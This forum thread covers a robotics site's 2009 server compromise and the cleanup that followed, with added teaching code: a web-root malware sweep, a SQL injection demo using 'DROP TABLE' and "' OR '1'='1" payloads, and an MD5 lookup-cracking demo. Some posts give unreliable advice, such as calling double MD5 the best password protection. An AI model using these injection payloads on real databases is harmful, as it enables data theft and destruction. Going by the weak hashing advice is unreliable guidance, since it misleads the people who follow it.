Society of Robots - Robot Forum

General Misc => Misc => Topic started by: want2learn on March 14, 2009, 12:15:10 AM

Title: Trojan horse on SoR??
Post by: want2learn on March 14, 2009, 12:15:10 AM
Anyone else get this or just me?

I have SoR in my favourites but the page is linked to the $50 robot tutorial, I just navigate to the forum from there, no big hassle really.
Since last night I've been getting a message from avast that 'step by step robot[1]htm contains a sample of JS Redirector E trojan horse'.

I've cleaned my computers but don't know if it's actually SoR or me. The message is still coming today.

Anyone else get this?

EDIT: I've now been on a lot of other sites with absolutely no problems at all. It's now happening on more of SoR's pages and I had a bit of a time trying to get back onto the forum.
I'm beginning to think it's not me ???
Title: Re: Trojan horse on SoR??
Post by: MrWizard on March 14, 2009, 10:26:48 AM
I have no problem.....what kind of anti-virus software are you using ?
Title: Re: Trojan horse on SoR??
Post by: want2learn on March 14, 2009, 11:47:06 AM
Avast (free edition). The resident scanner is picking up the redirector; I only noticed because my link in my favourites is to the $50 tutorial and not the forum. I'm too lazy to change it ;D

I've tried loads of the other links in my favourites and I've browsed the net for a couple of hours too without problem, I'm only getting it with SoR

EDIT:- Since finding this yesterday, I've found the forum incredibly slow to load. Sometimes not even at all.

The homepage is giving the alert too. Funny, because not the whole site seems to be affected, except for the slow loading issue (although all of the pages I have tried so far are slow, some are just marginally slower).
Title: Re: Trojan horse on SoR??
Post by: sigurd on March 14, 2009, 02:50:17 PM
I am getting that message too... :-\
Maybe it's a glitch with Avast!...
Wait, it can't be a new glitch... it hasn't updated for a while...
I hope it gets fixed soon...
Title: Re: Trojan horse on SoR??
Post by: Razor Concepts on March 14, 2009, 04:10:58 PM
I'm on Avast free edition and nothing comes up.
Title: Re: Trojan horse on SoR??
Post by: galannthegreat on March 14, 2009, 04:47:43 PM
New avast update I'm guessing. Really annoying, but I do notice it is reporting it as "MALWARE", so somebody should look into it pronto.
Title: Re: Trojan horse on SoR??
Post by: SmAsH on March 14, 2009, 05:12:38 PM
Wait, so when you scan for viruses there is a file labelled "SoR $50 robot" from your favourites that your PC sees as a virus?
Title: Re: Trojan horse on SoR??
Post by: HDL_CinC_Dragon on March 14, 2009, 05:14:04 PM
I'm running Norton and nothing comes up. My web browser is also Google Chrome. I'll try it on Firefox and IE.

-EDIT-
I just looked at step 1 of the tutorial in all 3 of my browsers and no warnings come up.
Usually Google Chrome will automatically redirect away from a web page that it has had reports of being malicious. It brings you to a page that says why it was red-flagged and then you can click a link that either takes you back to the page anyway or goes into more detail about the threat.
Title: Re: Trojan horse on SoR??
Post by: SeagullOne on March 14, 2009, 06:50:59 PM
I too am getting a warning for a Trojan horse, and I too am using the Avast! free edition. It really confused me because it's never done that before ???
Title: Re: Trojan horse on SoR??
Post by: Admin on March 14, 2009, 07:16:34 PM
The next time this happens, go to View Source, save it as a .txt, and email it to me.

[email protected]@gmail.DOT.c0m

There is quite the small possibility that someone hacked me and modified source code . . .
Title: Re: Trojan horse on SoR??
Post by: want2learn on March 15, 2009, 01:46:22 AM
The next time this happens, go to View Source, save it as a .txt, and email it to me.

Can't find any option to view source but I'm emailing you what I did find.
Title: Re: Trojan horse on SoR??
Post by: SmAsH on March 15, 2009, 02:05:44 AM
When you're in the tutorial, right-click and go to View Page Source. It should open a new window with something like this:

Then copy it into a .txt file and email it to John (admin).
Title: Re: Trojan horse on SoR??
Post by: Admin on March 15, 2009, 02:17:45 AM
I've looked through the various most likely to be infected files and couldn't see anything obvious. I need to see the page source to see exactly whats going on.

What browser and OS are you guys using?

My theory is that Statcounter, which runs a javascript on every page in SoR, is infected itself. It's external to SoR, so I'd have to write them if that's the case.

This look familiar? http://www.statcounter.com/counter/counter.js (http://www.statcounter.com/counter/counter.js)

I also run two javascripts from Google, so I'll assume they are secure . . .
http://www.google-analytics.com/urchin.js (http://www.google-analytics.com/urchin.js)
http://pagead2.googlesyndication.com/pagead/show_ads.js (http://pagead2.googlesyndication.com/pagead/show_ads.js)
Title: Re: Trojan horse on SoR??
Post by: want2learn on March 15, 2009, 02:31:02 AM
Sorry it's taking me a minute to get things done.

The only Windows computer we have is my wife's laptop; the usual browser on this one is AOL's default browser. I had to start IE then get the source.

My home network has been down a while for, ahem (clears throat), maintenance. I really need to get some motivation to get things done :D

I've started one of my kids pc's which is running Ubuntu LTS, got firefox booted and wheyhey no problems, no redirection, NOTHING.

I'm starting to think this is a false positive from AVAST?
Title: Re: Trojan horse on SoR??
Post by: Admin on March 15, 2009, 02:38:34 AM
It's NOT a glitch . . .

want2learn just sent me the source, and holy crackers its loaded with bad stuff!!!

Incredibly obfuscated javascript, billions of random links, porn sites, etc. It seems to all be appended at the end of the page.

Strangely, however, I don't see this at my end. I looked through all the pages, viewing source and all, but I don't see anything . . . I refreshed the main page many times thinking it's a trojan that intentionally appears some small percentage of the time. Still didn't see anything.

No files are listed as modified that I didn't personally modify (checking by date).

Quote
I had to start IE then get the source.
I don't see it in IE 6 either . . .

My Norton AV isn't detecting anything . . .

Does this happen on *every* page load? Just the main page, or all pages? Does it also happen in the forum?
Title: Re: Trojan horse on SoR??
Post by: want2learn on March 15, 2009, 02:46:35 AM
The resident scanner warnings have been happening on the SoR Homepage, The $50 tutorial pages and the whole site has been slower loading.

Funny thing is I've just started looking through the site on both computers to give a comprehensive list and voila! No more problems ;D
Title: Re: Trojan horse on SoR??
Post by: Admin on March 15, 2009, 04:11:55 AM
want2learn emailed me and said it occurs on both Linux and Windows, on IE and Firefox.

I did a rootkit scan . . . apparently the SoR server has been rootkitted. So supposedly my site host screwed up security settings and that's how the baddies got in . . . I sent them an email but that's all I can do right now.

For now, if you visit SoR, TURN ON YOUR ANTI-VIRUS SOFTWARE!!! Also, temporarily disable javascript and redirects if you're extra paranoid . . .
Title: Re: Trojan horse on SoR??
Post by: SmAsH on March 15, 2009, 04:20:52 AM
Wait, if I have Norton 360 it's always on, right? And I'm using Firefox, which says it scans webpages and downloaded files? You got me all paranoid now :-[ Oh well, Norton says phishing protection is on. Not much more I can do really, eh. Sit back and read away 8)
Title: Re: Trojan horse on SoR??
Post by: Tsukubadaisei on March 15, 2009, 04:34:00 AM
want2learn emailed me and said it occurs on both Linux and Windows, on IE and Firefox.

I did a rootkit scan . . . apparently the SoR server has been rootkitted. So supposedly my site host screwed up security settings and that's how the baddies got in . . . I sent them an email but that's all I can do right now.

For now, if you visit SoR, TURN ON YOUR ANTI-VIRUS SOFTWARE!!! Also, temporarily disable javascript and redirects if you're extra paranoid . . .

Just reporting but, I am on Linux(Fedora 10, up-to-date) and no problems.
Title: Re: Trojan horse on SoR??
Post by: airman00 on March 15, 2009, 07:31:06 AM
I assume that since I am on Mac there is no problems for me personally?
Title: Re: Trojan horse on SoR??
Post by: want2learn on March 15, 2009, 10:12:17 AM
Sorry I should've posted earlier but had kid stuff to take care of.

I know it may not be cleaned yet, but in my last email to Admin I said I was no longer getting the alert and that I had attached another copy of the source, which I thought looked pretty clean (compared to the first, but I'm definitely no programmer so I'd tend to take Admin's word on it).
Title: Re: Trojan horse on SoR??
Post by: paulstreats on March 16, 2009, 07:07:58 AM
I got the same redirects on the family computer while looking at the forum coming from the main SoR page (the first time I've had pop-ups happen for a couple of years). It also created an 'add-on' in Internet Explorer and a memory process that replaced the add-on if you disabled it. A quick scan and removal with Malwarebytes Anti-Malware sorted it out. I wonder if it is a random thingy or could it be getting in through the random Google ads?
Title: Re: Trojan horse on SoR??
Post by: Admin on March 16, 2009, 10:02:21 AM
SoR has been rootkitted at the server level (meaning they changed files on the server that I can't access).

My host hasn't responded to my email . . .

so all I can say right now is:

BLOCK REDIRECTS in your browser

DISABLE JAVASCRIPT in your browser
Title: Re: Trojan horse on SoR??
Post by: HDL_CinC_Dragon on March 16, 2009, 01:44:37 PM
Google Chrome build 1.0.154.48 on Windows XP Home SP3 (dunno what the heck happened to my Pro copy....) with Norton Anti-Virus Gaming Edition build 16.2.0.7.
No problems here. I'll start looking at source code to see if I'm getting the malicious JS on my end.


-EDIT-
I loaded several different SoR pages and looked through the page sources and found nothing out of the ordinary. I skimmed the whole thing and saw nothing that would be malicious.... has the problem been fixed already?
Title: Re: Trojan horse on SoR??
Post by: Admin on March 16, 2009, 08:03:38 PM
No the problem has not been fixed.

It appears to be a hack that randomly appears only some percentage of the time.
Title: Re: Trojan horse on SoR??
Post by: HDL_CinC_Dragon on March 17, 2009, 01:47:21 PM
Hmm, I just sat on step_by_step_robot_step1.shtml and refreshed about 20 times in Google Chrome and 20 times in Firefox and skimmed the source code each time and didn't come up with anything.... Maybe it knows I'd strangle it with its own lines of code if it showed its ugly face?

Oh well, guess I'm done on this topic then lol
Title: Re: Trojan horse on SoR??
Post by: offy on March 17, 2009, 03:18:45 PM
I went through all the files, checking the code and JavaScript, and it all seems good. I am using Firefox 3 on Ubuntu 8.10.

@admin: I know a few really good hosts that don't get any problems that you may want to look into, send me a PM or something.

@all: If someone does get a trojan horse don't worry. You can remove them. If you need help just PM me.
Title: Re: Trojan horse on SoR??
Post by: Admin on March 18, 2009, 12:05:18 AM
My host claims their own rootkit scanner is often wrong. They also blame php.ini (which runs the forum) as the problem.

But the main SoR site doesn't use php . . .

So question to everyone, has the problem only happened on the regular site with .shtml pages, or does it also happen in the forum too?
Title: Re: Trojan horse on SoR??
Post by: Admin on March 18, 2009, 12:44:15 AM
Ok I found the hack, finally!

Apparently this forum was hacked through a php script . . . still trying to figure out how that infected non-forum pages . . .

I'm working with the SMF creators to figure this out:
http://www.simplemachines.org/community/index.php?topic=299718.0 (http://www.simplemachines.org/community/index.php?topic=299718.0)

In the meantime, please report any weirdness to me.
Title: Re: Trojan horse on SoR??
Post by: Admin on March 18, 2009, 09:55:01 AM
The next time someone sees the hack happen, please email me the exact url in the address bar that you see. I have a theory . . .
Title: Re: Trojan horse on SoR??
Post by: HDL_CinC_Dragon on March 18, 2009, 01:36:41 PM
Ok, I'm now checking the source code every time I load a page on SoR. You said the malicious links were just appended onto the end, right?
Title: Re: Trojan horse on SoR??
Post by: offy on March 18, 2009, 01:51:22 PM
I used to hack (bad offy) and I know a few ways people could have got in. Admin, if you would like me to patch up some flaws in the system, I can.
Title: Re: Trojan horse on SoR??
Post by: Admin on March 18, 2009, 11:28:40 PM
I had a look at the error logs myself, didn't trust my host . . . believe it or not, the hacker has been trying to break into SoR since mid-January . . . mostly failed brute-force attempts; the most recent were failed PHP attacks on the forum (I didn't know they failed at first). It wasn't the forum that was hacked after all.

I haven't figured out how they got in, but I finally found their nasty redirect script. It appears to overrule the default index file on a webserver . . . scary!

Again, if anyone sees the problem come up again, let me know! I think I cleaned it all out, but I'm really not sure. This hacker seems determined . . .
Title: Re: Trojan horse on SoR??
Post by: dellagd on March 19, 2009, 01:47:06 PM
I have been on SoR for a while and I haven't seen any security pop-ups or anything unusual.
I use 2 computers.
2 Windows XPs, one running Firefox Portable Edition and another IE 7.
Maybe it doesn't happen to my IP for some reason.
Title: Re: Trojan horse on SoR??
Post by: offy on March 19, 2009, 02:12:15 PM
I have not noticed it either. But I have some javascript disabled for my own protection, and I think that is why most of us do not see it.
Title: Re: Trojan horse on SoR??
Post by: want2learn on March 19, 2009, 02:14:38 PM
I use a couple of computers too: wife's laptop on Vista, kids pc's on Ubuntu and my laptop on DSL.

Never experienced one problem at all with SoR  ;D until the evening before I raised this post  :(

I've got to say Admin's done a great job of things, even more so because this isn't his full-time job.

Hats off to you admin!
Title: Re: Trojan horse on SoR??
Post by: dellagd on March 19, 2009, 06:09:49 PM
I think you are understating this site.
This is THE BEST amateur robotics site there is, by far.
Title: Re: Trojan horse on SoR??
Post by: Admin on March 19, 2009, 11:39:27 PM
 :)

Oh and behind the scenes, Dunk has been helping me secure the SoR site too. Extra props for him.
Title: Re: Trojan horse on SoR??
Post by: TrickyNekro on March 20, 2009, 02:02:41 AM
I just don't understand why they would want to hack a robot forum....
It's a noble cause after all....

Thanks Admin and Dunk!!!
Title: Re: Trojan horse on SoR??
Post by: Admin on March 20, 2009, 04:08:03 AM
I just don't understand why they would want to hack a robot forum....
It's a noble cause after all....
I don't think they want to destroy SoR. I just think they want to use any vulnerable server they can to spread their malware. It's probably to their benefit to not make their hack obvious. They hacked SoR like 6 weeks ago, but we didn't know until virus detectors saw it.
Title: Re: Trojan horse on SoR??
Post by: dellagd on March 20, 2009, 06:07:17 AM
hey,
look at it this way!
SoR is so good now that people want to hack it :P !
Title: Re: Trojan horse on SoR??
Post by: Admin on March 20, 2009, 10:51:25 PM
So you guys have probably noticed me AWOL for a few days . . . I've been trying to deal with this hack like 24/7 for the last few days.

I think I *finally* found the source of the hack. There was a known security flaw with my server control panel since August last year and I didn't patch it. I have 90% confidence that was the problem, and that it's now patched.

That doesn't mean there still isn't a backdoor hidden somewhere that I didn't clean out . . . so I'm trying my best to make SoR more secure and to prevent this from happening again. It's my crash course in web security, I guess . . .

Strangely, they never bothered trying to hack my other website that's on the same server . . . I wouldn't have even noticed it as I rarely update it . . .

Lessons I've learned about web security to share with you guys:
- turn off all features on your server that you don't use (CGI, Perl, Ruby, PHP, etc.) as it increases the number of possible hacks
- update and patch your website/server software very often, like once a month or more
- keep an eye out for strange files on your server
- look at your error log occasionally for odd stuff
- block IP addresses in .htaccess that do bad stuff, as shown by your error log
- back up often, with the assumption that you'll have to delete your entire server to clean out a hack
- don't trust your web host to patch/update their own systems
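The sweep below is an added example, not code from the Society of Robots site or from anyone in this thread. It does, for a static site on shared hosting, what the lessons list above asks for and what the admin did by hand earlier in the thread: finds files changed since a known-good baseline, inspects the tail of each page for the kind of obfuscated script blob that was found appended to SoR pages, mines the Apache error log for clients probing the site, and emits the .htaccess lines that deny them. Every path, page and log line is constructed for the demo; the web root layout and file names are assumptions.

```python
"""Added example, not code from the Society of Robots site or this thread.
A post-compromise sweep for a static site on shared hosting: find files changed
since a known-good baseline, inspect page tails for an appended obfuscated script
blob like the one found on SoR pages, mine the Apache error log for probing clients
and emit .htaccess lines denying them. All paths, pages and log lines are constructed."""
import os
import re
import tempfile
import time
from collections import Counter
from pathlib import Path

# Markers that, in combination, suggest obfuscated JavaScript.
OBFUSCATION_MARKERS = {
    "eval": re.compile(r"\beval\s*\("),
    "unescape": re.compile(r"\bunescape\s*\("),
    "escaped run": re.compile(r"(?:%[0-9a-fA-F]{2}|\\x[0-9a-fA-F]{2}){8,}"),
}
TAIL_BYTES = 4096  # the injected payload sat at the end of the page


def page_findings(html):
    """Reasons to distrust a page, judged from its tail. Empty list means it looks clean."""
    tail = html[-TAIL_BYTES:]
    reasons = []
    _head, closing, after = tail.lower().rpartition("</html>")
    if closing and "<script" in after:
        reasons.append("script after </html>")
    hits = [name for name, rx in OBFUSCATION_MARKERS.items() if rx.search(tail)]
    if len(hits) >= 2:
        reasons.append("obfuscation markers: " + ", ".join(hits))
    return reasons


def sweep_webroot(root, baseline_epoch):
    """Files modified after the baseline, and pages with findings, as relative paths."""
    modified, flagged = [], {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            if os.path.getmtime(path) > baseline_epoch:
                modified.append(rel)
            if name.endswith((".html", ".htm", ".shtml", ".php")):
                reasons = page_findings(Path(path).read_text(encoding="utf-8", errors="replace"))
                if reasons:
                    flagged[rel] = reasons
    return sorted(modified), flagged


# Apache 2.2 error_log shape: [timestamp] [level] [client IP] message
ERROR_LINE = re.compile(r"^\[[^\]]+\] \[\w+\] \[client (?P<ip>[\d.]+)\] (?P<msg>.*)$")
# Messages that, repeated from one client, look like probing rather than browsing.
PROBE_MSG = re.compile(r"File does not exist|script not found|authentication failure", re.I)


def abusive_clients(log_lines, threshold=4):
    """IP -> number of probe-like errors, for clients at or above the threshold."""
    counts = Counter()
    for line in log_lines:
        m = ERROR_LINE.match(line)
        if m and PROBE_MSG.search(m.group("msg")):
            counts[m.group("ip")] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


def htaccess_deny(ips):
    """Apache 2.2 mod_access block that denies the given clients and allows everyone else."""
    body = [f"Deny from {ip}" for ip in sorted(ips)]
    return "\n".join(["Order allow,deny", *body, "Allow from all"]) + "\n"


CLEAN_PAGE = "<html><head><title>Step 1</title></head><body><p>Build the $50 robot.</p></body></html>\n"
# Constructed stand-in for an appended redirector: script past the closing tag, payload in escaped bytes.
TAMPERED_PAGE = CLEAN_PAGE + '<script>eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65"));</script>\n'
SAMPLE_ERROR_LOG = [  # constructed lines in Apache 2.2 format
    "[Sun Mar 15 02:10:01 2009] [error] [client 203.0.113.7] File does not exist: /var/www/html/admin",
    "[Sun Mar 15 02:10:02 2009] [error] [client 203.0.113.7] File does not exist: /var/www/html/phpmyadmin",
    "[Sun Mar 15 02:10:03 2009] [error] [client 203.0.113.7] File does not exist: /var/www/html/cpanel",
    "[Sun Mar 15 02:10:04 2009] [error] [client 203.0.113.7] script not found or unable to stat: /var/www/cgi-bin/a.cgi",
    "[Sun Mar 15 02:11:00 2009] [error] [client 198.51.100.4] File does not exist: /var/www/html/favicon.ico",
]


def demo():
    """Build a throwaway web root with one back-dated clean page and one tampered page, then sweep."""
    with tempfile.TemporaryDirectory() as root:
        baseline = time.time() - 86400  # last known-good check: a day ago
        clean = Path(root, "index.shtml")
        clean.write_text(CLEAN_PAGE, encoding="utf-8")
        os.utime(clean, (baseline - 3600, baseline - 3600))  # untouched since before the baseline
        Path(root, "step_by_step_robot_step1.shtml").write_text(TAMPERED_PAGE, encoding="utf-8")
        modified, flagged = sweep_webroot(root, baseline)
    bad = abusive_clients(SAMPLE_ERROR_LOG)
    return {"modified": modified, "flagged": flagged, "deny": bad, "htaccess": htaccess_deny(bad)}


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The mtime check is only as good as the baseline: an attacker with shell access can reset timestamps, which is why the content check on page tails runs independently of it. The `Order`/`Deny from` syntax is the Apache 2.2 mod_access form in use at the time of the thread; Apache 2.4 replaced it with `Require not ip`.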
Title: Re: Trojan horse on SoR??
Post by: Admin on March 23, 2009, 01:56:29 AM
I figured with all that I learned about defending websites against hacks in the last week, I should at least write up the basics and share.

Some of you already have started your own robotics website, so hopefully you find it useful:
http://www.societyofrobots.com/misc_hackproof.shtml (http://www.societyofrobots.com/misc_hackproof.shtml)
Title: Re: Trojan horse on SoR??
Post by: SmAsH on March 23, 2009, 02:17:26 AM
Thanks for posting that, Admin. I'm sure many people who have their own sites will find it helpful, and I know I will if I ever start my own site :) Props to you 8)
Title: Re: Trojan horse on SoR??
Post by: offy on March 23, 2009, 04:08:46 PM
Also check your .htaccess. The .htaccess can change many settings, and can set up holes for hackers to get in. Also always download the newest script from a site if you are using a CMS. They update it for a reason, not just to waste 10 mins of your time to download, and upload.
Title: Re: Trojan horse on SoR??
Post by: paulstreats on March 23, 2009, 05:55:40 PM
Everybody should be aware of the "Conficker worm/bot" (a worm that makes you part of a botnet, then downloads more software, maybe for controlling/monitoring systems). I heard today that an upgraded version is expected to hit on April the 1st again (it hit last April 1st with a small target list and was controlled before it got out of hand; an upgraded version has already been released around January with a larger list, but this might have been a test run for another April Fools' Day run...).

It exploits the communication stack by overflowing it and gets allowed to run automatically without permission, and presumably communicates over the net by overflowing the stack and confusing firewalls? Updates and patches are really the only defence for Windows systems.

Look it up: it prevents you from downloading common virus removal tools, stops you from accessing process managers, prevents you from using the Microsoft upgrade/patch tool and other stuff.

If it wasn't malicious, I'd take my hat off. Microsoft has a removal tool for the first version and they actually offer a $250,000 reward for information that leads towards an arrest of the creators. It really has caused that much damage, not only in systems but obviously man-hours too (not to mention the flaw that it exploits works for all versions of Windows, including the new Windows 7).
Title: Re: Trojan horse on SoR??
Post by: offy on March 23, 2009, 06:52:07 PM
Also back to websites.

People can crash sites if they truly try, with no hacking. They run something called DoS or DDoS. Some people also run a bandwidth attack.

DoS: Means Denial of Service. They will ping out your server (with a team of around 100 computers or more) and your server will get so much "traffic" that it will crash.

DDoS: Is the same thing as DoS but more advanced and faster.

Bandwidth attack: Someone will upload a very large image, or get access to a very large page on your site, and open the page millions of times, causing your bandwidth usage to go up. This then makes you go over your bandwidth limit, and your site is inactive for a month or whenever your bandwidth resets.


I have been making PHP-based sites for a few years, and I know all about these attacks. I learned to hack to keep my stuff safe after 3 of my sites got hacked.
Title: Re: Trojan horse on SoR??
Post by: paulstreats on March 23, 2009, 07:08:45 PM
This is also the purpose behind the botnets. If you have a botnet under control, you can use it to purposefully crash systems. Large corporations occasionally get ransom demands from botnets. (pay us $$$$$ or we'll crash your system with our bot net)
Title: Re: Trojan horse on SoR??
Post by: householdutensils on March 23, 2009, 07:16:23 PM
Stress attacks shouldn't be handled by PHP or any server-side scripting language (as in, the languages you use to deliver pages) 0_0; they should be handled at daemon level. Apache modules for flood protection spring to mind. Obviously this is circumvented by using distributed botnets; however, servers are still basically socket applications, so you can always limit the number of incoming connections to a low number if there is suddenly a large amount of stress applied to your boxes (though this is not really viable on high-traffic sites where stress is highly variable).

Besides, some of the most damaging attacks are the SQL injections that drop whole databases, and XSS and malicious code and session hijacking and screwed-up folder permissions, or exploits in web applications.

Hell, even cryptography comes into play when there are growing databases of MD5 hashes for strings, so people can reverse the basic MD5 encryption used by most PHP applications by simply searching for the string that matches the hash.
Title: Re: Trojan horse on SoR??
Post by: offy on March 24, 2009, 12:56:15 PM
There are many SQL injections. With them you could get the passwords from the database, but they will still need to be cracked using brute force.

XSS should not be a problem nowadays. Our technology knowledge got better, so the only way you will have an XSS problem is if you are 100% new to programming and make a really bad PHP website (my first PHP website had this problem).
Title: Re: Trojan horse on SoR??
Post by: householdutensils on March 24, 2009, 01:09:24 PM
Well thats the thing. Since md5 is generally non-reversible (Authentication compares two hashes to determine if they come from the same string) outside of rainbow tables and other extremely complicated cryptography techniques that I'm not familiar with, it should be fairly secure. But the thing is, people have started creating databases of strings that match hash codes so that you can essentially search for a hash code, and provided it has already been added to the database, get back the initial string.

Besides, SQL injections as a method are dangerous. Anyone seen the xkcd comic about Robert'); DROP TABLE students;?

(http://imgs.xkcd.com/comics/exploits_of_a_mom.png)

As for XSS, well.... with complexity invariably comes vulnerability. Even some of the most widely used PHP apps have had XSS exploits released for them fairly recently. It might be easy to prevent XSS in a small to medium-size application, but once things start getting complicated enough, it's easy to open up gaping holes just waiting for someone to dive through. The problem's even worse for open-source software that freely releases its source. That whole crazy Crash Override Hollywood hacker paradigm really needs to be changed to some dude in trackpants with a terminal addiction to imitation-fruit-flavored soft drinks, poring over source code in his bedroom until the dull ache behind the eyes signals time for a power nap.
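As an added example (not code from anyone in this thread), the comic's input from the post above is run against a query built by string concatenation, the habit the thread associates with hand-rolled PHP sites, and against a parameterised query, on an in-memory SQLite database. The `students` table and its rows are made up for the demo. One caveat worth knowing: the DROP only lands when the driver executes stacked statements (PHP's old `mysql_query()` refused more than one statement per call, other drivers do not), so the block also shows the `' OR '1'='1` form, which leaks every row through a single statement regardless.

```python
"""Added example, not from the thread: the xkcd "Bobby Tables" input run against a
query built by string concatenation and against a parameterised query, on an
in-memory SQLite database. The students table and its rows are made up for the demo."""
import sqlite3

BOBBY = "Robert'); DROP TABLE students;--"   # the comic's input, verbatim
DUMP_ALL = "' OR '1'='1"                      # single-statement injection: no stacking needed


def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE students (name TEXT)")
    conn.execute("INSERT INTO students VALUES ('Alice')")
    conn.commit()
    return conn


def insert_concatenated(conn, name):
    """Vulnerable: the value is spliced into SQL text, and the driver runs every statement in it."""
    conn.executescript("INSERT INTO students (name) VALUES ('" + name + "');")


def lookup_concatenated(conn, name):
    """Vulnerable even where stacked statements are refused: the WHERE clause itself is rewritten."""
    rows = conn.execute("SELECT name FROM students WHERE name = '" + name + "'")
    return [r[0] for r in rows]


def insert_parameterised(conn, name):
    """Fixed: the value travels as a bound parameter and is never parsed as SQL."""
    conn.execute("INSERT INTO students (name) VALUES (?)", (name,))
    conn.commit()


def lookup_parameterised(conn, name):
    return [r[0] for r in conn.execute("SELECT name FROM students WHERE name = ?", (name,))]


def table_exists(conn):
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = 'students'").fetchone()
    return row is not None


def students(conn):
    return [r[0] for r in conn.execute("SELECT name FROM students ORDER BY name")]


def demo():
    vulnerable = fresh_db()
    leaked = lookup_concatenated(vulnerable, DUMP_ALL)   # every row, not just one name
    insert_concatenated(vulnerable, BOBBY)               # second statement drops the table
    safe = fresh_db()
    insert_parameterised(safe, BOBBY)                    # stored literally, table intact
    return {"leaked": leaked,
            "table_survives_concat": table_exists(vulnerable),
            "table_survives_param": table_exists(safe),
            "safe_rows": students(safe),
            "safe_lookup": lookup_parameterised(safe, DUMP_ALL)}


if __name__ == "__main__":
    print(demo())
```

The concatenated query becomes `INSERT INTO students (name) VALUES ('Robert'); DROP TABLE students;--');`: the quote closes the string, the semicolon ends the statement, and `--` comments out the leftover `');`. With a bound parameter the same bytes are stored as a name and the lookup for `' OR '1'='1` finds nothing, because no row has that literal name.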
Title: Re: Trojan horse on SoR??
Post by: offy on March 24, 2009, 03:03:22 PM
I love that comic, saw it like a million times. There are some very fast-working MD5 crackers. I coded this one a while back (shame on me again) that would check every single letter, number, symbol, depending on what I set it on. Then it would save all the results to a .txt file, so whenever I needed to crack an MD5, I could in a matter of minutes, instead of the days, months, years other programs take.

Also, very big PHP scripts do have XSS problems sometimes, but if they double-check their work they can fix it, and if they do find one, it is very simple to fix; a few lines of code fixes it.

This just shows you no site is safe. When there are hackers and sites (and computer) open for attack, someone will get in, and it might just be a black hat for all you know, and they will sell your users emails, names, addresses. But for us lucky ones, the white hat will get in, and help us fix our site.
Title: Re: Trojan horse on SoR??
Post by: householdutensils on March 24, 2009, 03:20:27 PM
Haha all those comics are GOLD!! I love geek humor :D


Anyway, from my primitive understanding of cryptography, the avalanche effect makes letter by letter calculation completely irrelevant. I mean the 128-bit hash code can encrypt a variable length string, so the only way to get the original string is to completely disassemble the hash and reverse the mod operation processes that are used to create it, and even then, you'd need to know the original string since the algorithm uses integer derivatives of the initial string as constants in the encryption process.

At least, as far as I understand, I'm pretty lacking in this area since I've never really used it in practical application.
Title: Re: Trojan horse on SoR??
Post by: offy on March 24, 2009, 05:07:57 PM
Well, the best way to secure a website is to do what I do now: double MD5. I set it up so a user makes a password. Then it will make an MD5 of it. Then that MD5 gets encrypted to MD5 again, so a hacker will hack the password field of my site and will get the MD5 of an MD5; they will get so confused and mad. It is a great way, but takes longer to code.

The only way to be safe from a hacker, is to learn and hack your own sites over and over making sure there are no flaws. Some people even hire hackers to get into their site, to make sure it is safe.
Title: Re: Trojan horse on SoR??
Post by: householdutensils on March 24, 2009, 05:11:20 PM
hahahaha that's so awesome xD a hash of a hash of a string :D

Though it shouldn't take longer to code...given that all you need to do to use md5 is md5($string) ;) In fact you could nest it:

md5(md5($string));

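An added example, not code from anyone in this thread, of the precomputed-lookup attack householdutensils describes (a database mapping hashes back to the strings that produced them), run against plain `md5($p)` and against the nested `md5(md5($p))` from the last two posts. A salted, iterated hash (PBKDF2-HMAC-SHA256) is included for contrast; that part goes beyond what the posts discuss. The word list and passwords are constructed; PHP's `md5()` returns lowercase hex, so `double_md5` below hashes exactly what `md5(md5($string))` would.

```python
"""Added example, not from the thread: a precomputed lookup table (hash -> plaintext) run
against md5($p) and against md5(md5($p)), with a salted, iterated hash for contrast.
The word list and passwords are constructed."""
import hashlib
import os


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


def double_md5(text):
    """md5(md5($string)): the inner digest is re-hashed as its 32 lowercase hex characters."""
    return md5_hex(md5_hex(text))


def salted_hash(password, salt, iterations=100_000):
    """Per-user random salt plus a deliberately slow derivation."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations).hex()


# A tiny stand-in for the attacker's dictionary.
WORDLIST = ["password", "letmein", "robot", "servo123", "arduino", "qwerty"]


def build_table(hash_fn, words):
    """One-off precomputation: hash every candidate once, index digest -> plaintext."""
    return {hash_fn(w): w for w in words}


def crack(table, digest):
    """One dictionary lookup per stolen digest; None if the password is not in the table."""
    return table.get(digest)


def demo(password="servo123"):
    single_table = build_table(md5_hex, WORDLIST)
    double_table = build_table(double_md5, WORDLIST)  # same cost: the hashing scheme is not a secret
    salt = os.urandom(16)                               # what a salted scheme stores beside the hash
    # The attacker can only precompute for salts they know; this table assumed an all-zero salt.
    guessed_salt_table = build_table(lambda w: salted_hash(w, b"\x00" * 16, 1000), WORDLIST)
    return {
        "single": crack(single_table, md5_hex(password)),
        "double": crack(double_table, double_md5(password)),
        "salted": crack(guessed_salt_table, salted_hash(password, salt, 1000)),
    }


if __name__ == "__main__":
    print(demo())
```

Building the double-MD5 table costs one extra `md5` per word and nothing more, so a stolen `md5(md5($p))` column falls to the same dictionary as a plain one. With a per-user salt, a table built ahead of time never matches, and the work has to be redone per account at the slowed-down rate.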
Title: Re: Trojan horse on SoR??
Post by: offy on March 24, 2009, 05:18:26 PM
Oh, never knew I could nest it, well this is not about coding. I am going to stop getting more off topic.

I think Admin should add some more security to this site. And maybe get someone to try to hack it, and then fix that flaw so this never happens again. (I am up for the job if needed.) (White hat hackers rule.)
Title: Re: Trojan horse on SoR??
Post by: Admin on April 07, 2009, 01:44:49 AM
Good news, sorta. My logs show the hacker trying to hack me again with the same old method. This time it's not sticking. I'm pretty sure that my new defenses have effectively blocked him for now, and removed whatever harm he added :)
Title: Re: Trojan horse on SoR??
Post by: superchiku on April 07, 2009, 01:53:30 AM
Hackers... in SoR? How come???
Title: Re: Trojan horse on SoR??
Post by: SmAsH on April 07, 2009, 01:55:07 AM
